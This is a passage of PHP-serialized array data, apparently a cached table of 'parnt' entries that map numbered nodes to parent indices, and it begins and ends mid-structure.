;i:1;}}}}i:97;a:2:{i:37;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:24;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:93;i:1;i:0;i:2;i:1;}}}}i:98;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:94;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:99;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:94;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:40;i:1;i:0;i:2;i:1;}}}}i:100;a:6:{i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:101;a:2:{i:54;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:96;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:97;i:1;i:0;i:2;i:2;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:1;i:2;i:1;}}}}i:102;a:1:{i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:103;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}}i:104;a:7:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:100;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:105;a:10:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:37;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}}i:106;a:4:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:100;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}}i:107;a:7:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:102;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:108;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:109;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:110;a:4:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:105;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:105;i:1;i:0;i:2;i:1;}}}}i:111;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:112;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:113;a:1:{i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:114;a:4:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:90;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:106;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:107;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}}i:115;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:116;a:1:{i:24;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:109;i:1;i:0;i:2;i:1;}}}}i:117;a:8:{i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:110;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:111;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:112;i:1;i:0;i:2;i:1;}}}i:21;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:51;i:1;i:0;i:2;i:1;}}}i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}}i:118;a:16:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:57;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:58;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:4:{i:0;a:3:{i:0;i:114;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:115;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:116;i:1;i:0;i:2;i:3;}i:3;a:3:{i:0;i:117;i:1;i:0;i:2;i:4;}}}i:59;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:60;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:61;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:62;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:63;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:64;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:119;a:4:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}}i:120;a:1:{i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:121;a:2:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}}i:122;a:1:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:123;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:124;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:125;a:6:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}}i:126;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:127;a:4:{i:65;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:119;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:128;a:1:{i:65;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:129;a:1:{i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}}i:130;a:2:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:120;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:120;i:1;i:0;i:2;i:1;}}}}i:131;a:6:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:102;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}}i:132;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:133;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:134;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:121;i:1;i:0;i:2;i:1;}}}}i:135;a:1:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}}i:136;a:1:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:137;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:138;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:139;a:2:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:140;a:1:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:1;i:2;i:1;}}}}i:141;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:121;i:1;i:0;i:2;i:1;}}}}i:142;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:122;i:1;i:0;i:2;i:1;}}}}i:143;a:1:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}}i:144;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:145;a:2:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:146;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:121;i:1;i:0;i:2;i:1;}}}}i:147;a:2:{i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:52;i:1;i:0;i:2;i:1;}}}}i:148;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:149;a:2:{i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:106;i:1;i:0;i:2;i:1;}}}i:51;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:123;i:1;i:0;i:2;i:1;}}}}i:150;a:7:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:124;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:124;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:125;i:1;i:0;i:2;i:1;}}}i:18;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:126;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:50;i:1;i:0;i:2;i:1;}}}}i:151;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:152;a:1:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:153;a:1:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:154;a:1:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:155;a:6:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:1;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:1;i:2;i:1;}}}}i:156;a:4:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:12;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:157;a:2:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:158;a:3:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:1;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:1;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:159;a:6:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:160;a:3:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:100;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:66;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}}i:161;a:1:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:162;a:1:{i:66;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:67;i:1;i:0;i:2;i:1;}}}}i:163;a:3:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:100;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:164;a:7:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:7;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:7;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:127;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:165;a:5:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:128;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:129;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:45;i:1;i:0;i:2;i:1;}}}}i:166;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}}i:167;a:8:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:168;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:169;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:170;a:3:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:41;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}}i:171;a:2:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:130;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"